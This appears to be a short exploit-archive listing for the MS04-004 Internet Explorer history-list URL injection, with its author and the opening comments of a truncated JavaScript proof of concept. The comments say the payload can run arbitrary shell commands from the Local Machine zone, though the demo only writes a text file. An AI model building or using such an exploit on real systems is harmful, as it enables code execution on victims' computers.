MS Internet Explorer URL Injection in History List (MS04-004)

Exploit for unknown platform in category remote exploits ============================================================= MS Internet Explorer URL Injection in History List MS04-004 ============================================================= // Andreas Sandblad, 2004-02-03, patched by MS04-004 //...

Microsoft Internet Explorer - URL Injection in History List (MS04-004)

// Andreas Sandblad, 2004-02-03, patched by MS04-004 // Name: payload // Purpose: Run payload code called from Local Machine zone. // The code may be arbitrary such as executing shell commands. // This demo simply creates a harmless textfile on the desktop. function payload file = "sandblad.txt";...